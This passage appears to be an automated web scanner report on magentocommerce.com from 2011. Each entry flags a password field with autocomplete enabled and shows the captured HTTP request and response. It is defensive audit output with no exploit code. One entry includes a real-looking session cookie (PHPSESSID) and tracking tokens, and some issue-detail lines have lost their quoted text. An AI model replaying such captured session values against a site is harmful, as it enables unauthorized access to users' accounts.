Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.28. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.29. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.30. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.31. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.32. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.33. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.34. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.35. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.36. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.37. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.38. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
</div>
<form action="http://www.magentocommerce.com/products/customer/account/loginPost/" method="post">
<input type="hidden" name="return_url" value="http://www.magentocommerce.com/download" />
...[SNIP]...
<dd><input type="password" id="fVal_password" class="fValidate['required'] input-text" name="login[password]" size="20" value="" maxlength="32" /></dd>
...[SNIP]...
5.39. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.40. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.41. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
